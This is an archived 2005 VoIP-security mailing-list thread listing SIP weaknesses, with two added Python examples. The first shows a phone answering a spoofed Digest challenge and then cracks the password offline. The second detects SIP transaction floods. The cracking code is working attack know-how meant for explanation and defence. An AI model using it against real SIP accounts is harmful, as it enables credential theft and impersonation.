[VOIPSEC] VoIP vulnerabilities summarization

Christophe christophe.benejean at u4eatech.com
Tue Dec 13 05:00:51 CST 2005


Sukery,

Thanks for this lovely summarization... You spoke about an attack
system; what is this attack system and where can we find it?

Thanks,

Christophe

-----Original Message-----
From: Voipsec-bounces at voipsa.org [mailto:Voipsec-bounces at voipsa.org] On
Behalf Of sukery
Sent: Tuesday 13 December 2005 11:00
To: Voipsec at voipsa.org
Subject: [VOIPSEC] VoIP vulnerabilities summarization



Here is the summarization of VoIP vulnerabilities, and we are proud to
say that we have realized an attack system to validate almost all of the
vulnerabilities, and I think points 2 and 3 are due to the
imperfection of the SIP protocol itself.

1. The traditional IP network is insecure; its data stream is open to the
public. VoIP, which is based on the IP network, certainly inherits this
insecurity. This situation brings lots of attacks, such as man-in-the-middle
attacks, call termination, SIP password brute-force cracking, etc.

2. SIP reuses the authentication mechanism from the HTTP protocol; in fact HTTP
authentication is totally imperfect when applied to the SIP protocol, because
it is single-direction authentication, which means that only the
server authenticates the endpoints; the endpoints do not authenticate the
server. This situation makes it easy to deceive endpoints because they do
not authenticate any entity in the network. Pseudo calls (calling someone
with a false user ID) and server impersonation are dangerous attacks due
to this vulnerability.

3. SIP communication is based on message transactions; however, the SIP
transaction mechanism is quite complicated. For example, when a stateful
proxy server receives a SIP request message, it first computes the
transaction ID for this message. If the transaction ID did not exist
before, this request message is regarded as a new message, and the server
will do a lot of things for this new message: save this message, create a
finite state machine for this message, construct a provisional response
message and send it back, save this response message, update the finite
state machine, decide the next hop of this request message based on the
complex routing rules, forward the request message, create one or more
client transactions for the request message... These steps surely
consume lots of CPU and memory resources. As a result, the server is
susceptible to DoS attacks when a hacker continually sends large
quantities of SIP request messages with different Call-IDs.

4. Unencrypted media streams such as RTP data are easy to wiretap.

5. Almost all VoIP software has some code flaws; in this case, even a single
malicious packet may bring down the server. We call this packet an
exception packet; in fact we have found exception packets against both
SIP servers and H.323 servers.

6. VoIP endpoints are much more intelligent than traditional PSTN
terminals; however, when this capability is abused, a lot of malicious
network attacks appear:
     disturbance calls
     call leaflets
     voice broadcast
     and more



>Chris
>
>I'm pretty heavily involved in SIP standards development, and have been
>for some time.  I talk regularly with the kind of folks that I think
>would know if their stuff had been "hit".  I know about plenty of
>attacks on the underlying infrastructure, including the platform
>attacks.  I have NEVER heard even a whisper of an actual attack on VoIP
>equipment that used exploits specifically related to SIP (which I don't
>think is substantially better or worse than other VoIP protocols).
>_______________________________________________
>Voipsec mailing list
>Voipsec at voipsa.org
>http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
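Points 1 and 2 of the summary above, worked through in code as an added example that is not part of the original post or of any product mentioned in it: a SIP user agent answers a Digest challenge (RFC 3261 section 22, which reuses RFC 2617) from whoever sent it, and the party that issued the challenge, or anyone who sniffed the exchange on the open network, recovers the password offline. The 401 message, the realm "example.org", the nonce, the user "alice" and the word list are all constructed for the example.

```python
"""SIP Digest authentication from both sides: the UAC answers any challenger,
and the challenger (or a sniffer) brute-forces the password offline."""
import hashlib
import re


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce) -> str:
    """RFC 2617 response without qop: MD5(HA1 ":" nonce ":" HA2)."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def parse_auth_params(header_value: str) -> dict:
    """Parse 'Digest realm="x", nonce="y", ...' into a dict (quoted or bare values)."""
    scheme, _, rest = header_value.partition(" ")
    if scheme != "Digest":
        raise ValueError(f"unsupported scheme {scheme!r}")
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', rest)}


# Constructed 401 as a rogue registrar would send it; the nonce is the attacker's choice.
ROGUE_401 = ("SIP/2.0 401 Unauthorized\r\n"
             "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
             'WWW-Authenticate: Digest realm="example.org", nonce="attackerpicked1"\r\n'
             "Content-Length: 0\r\n\r\n")


def uac_answer_challenge(challenge_401: str, username, password, method, uri) -> str:
    """What a SIP phone does on a 401: take realm and nonce from WWW-Authenticate
    and answer. Nothing in this step checks who issued the challenge."""
    www = next(l for l in challenge_401.split("\r\n")
               if l.lower().startswith("www-authenticate:"))
    p = parse_auth_params(www.split(":", 1)[1].strip())
    resp = digest_response(username, p["realm"], password, method, uri, p["nonce"])
    return (f'Authorization: Digest username="{username}", realm="{p["realm"]}", '
            f'nonce="{p["nonce"]}", uri="{uri}", response="{resp}"')


def crack_offline(authorization: str, method, wordlist):
    """Whoever holds the challenge and the Authorization header can test candidate
    passwords offline; the nonce does not help because the attacker chose or saw it."""
    p = parse_auth_params(authorization.split(":", 1)[1].strip())
    for pw in wordlist:
        if digest_response(p["username"], p["realm"], pw, method, p["uri"], p["nonce"]) == p["response"]:
            return pw
    return None


if __name__ == "__main__":
    # Constructed phone credentials and word list for the demonstration.
    auth = uac_answer_challenge(ROGUE_401, "alice", "s3cret", "REGISTER", "sip:example.org")
    print(auth)
    print("recovered:", crack_offline(auth, "REGISTER", ["123456", "password", "s3cret"]))
```

The response is a plain MD5 over a secret the client knows and values the challenger supplied, so a phone that registers to a spoofed registrar leaks a crackable hash on its first REGISTER. RFC 2617's qop=auth mode does add an Authentication-Info rspauth value by which the server proves it also knows the password, but that only helps if the UAC insists on it; the mode shown here has nothing of the kind.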
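Point 3 of the summary above, as an added example that is not from the post: a detector that keys each request by the RFC 3261 server-transaction identifier (section 17.2.3: top Via branch, sent-by and method), so that retransmissions of one INVITE cost nothing, and raises an alert when a single source opens more new transactions per second than a threshold. The addresses, the traffic and the threshold of 20 new transactions per second are constructed for the example.

```python
"""Detect a SIP new-transaction flood (many requests with fresh Call-IDs and
branches from one source) using the transaction key a stateful proxy computes."""
from collections import defaultdict, deque


def parse_sip_request(raw: str) -> dict:
    """Minimal SIP request parser: request line plus headers; the body is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "headers": headers}


def transaction_key(req: dict) -> tuple:
    """RFC 3261 section 17.2.3: with a z9hG4bK branch, the server transaction is
    identified by the top Via branch, its sent-by value and the request method."""
    via = req["headers"]["via"]
    params = via.split(";")
    sent_by = params[0].split()[-1]
    branch = next(p.split("=", 1)[1].strip() for p in params[1:]
                  if p.strip().startswith("branch="))
    return (branch, sent_by, req["method"])


class TransactionFloodDetector:
    """Sliding-window count of *new* server transactions per source address.
    Retransmissions hit an existing key and are not counted again."""

    def __init__(self, window_s: float = 1.0, max_new: int = 20):
        self.window_s = window_s
        self.max_new = max_new
        self.seen = set()                 # keys already counted (expire these in production)
        self.recent = defaultdict(deque)  # src -> timestamps of new transactions

    def observe(self, src: str, t: float, raw: str) -> bool:
        """Feed one request seen at time t; return True if src is over the threshold."""
        key = transaction_key(parse_sip_request(raw))
        if key in self.seen:
            return False                  # retransmission: no new proxy state
        self.seen.add(key)
        q = self.recent[src]
        q.append(t)
        while q and t - q[0] > self.window_s:
            q.popleft()
        return len(q) > self.max_new


def invite(call_id: str, branch: str, src_host: str) -> str:
    """Constructed INVITE with the given Call-ID and Via branch (sample input)."""
    return ("INVITE sip:bob@example.org SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP {src_host}:5060;branch=z9hG4bK{branch}\r\n"
            "From: <sip:alice@example.org>;tag=1928301774\r\n"
            "To: <sip:bob@example.org>\r\n"
            f"Call-ID: {call_id}@{src_host}\r\n"
            "CSeq: 1 INVITE\r\n"
            "Content-Length: 0\r\n\r\n")


def run_sample() -> dict:
    det = TransactionFloodDetector(window_s=1.0, max_new=20)
    # A legitimate phone retransmitting one INVITE three times (same Call-ID, same branch).
    phone = [det.observe("192.0.2.10", 0.5 * i, invite("c1", "abc", "192.0.2.10"))
             for i in range(3)]
    # A constructed flood: 40 INVITEs, each with a new Call-ID and branch, within 0.8 s.
    flood = [det.observe("198.51.100.7", 0.02 * i, invite(f"x{i}", f"f{i}", "198.51.100.7"))
             for i in range(40)]
    return {"phone_alerts": sum(phone), "flood_alerts": sum(flood),
            "first_alert_index": flood.index(True)}


if __name__ == "__main__":
    print(run_sample())
```

Counting transactions rather than packets is the point: the proxy's cost is in creating state, which a retransmitted request does not do but a request with a fresh Call-ID and branch always does. The `seen` set would need expiry (Timer H/J lifetimes in the RFC) in a long-running sensor.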
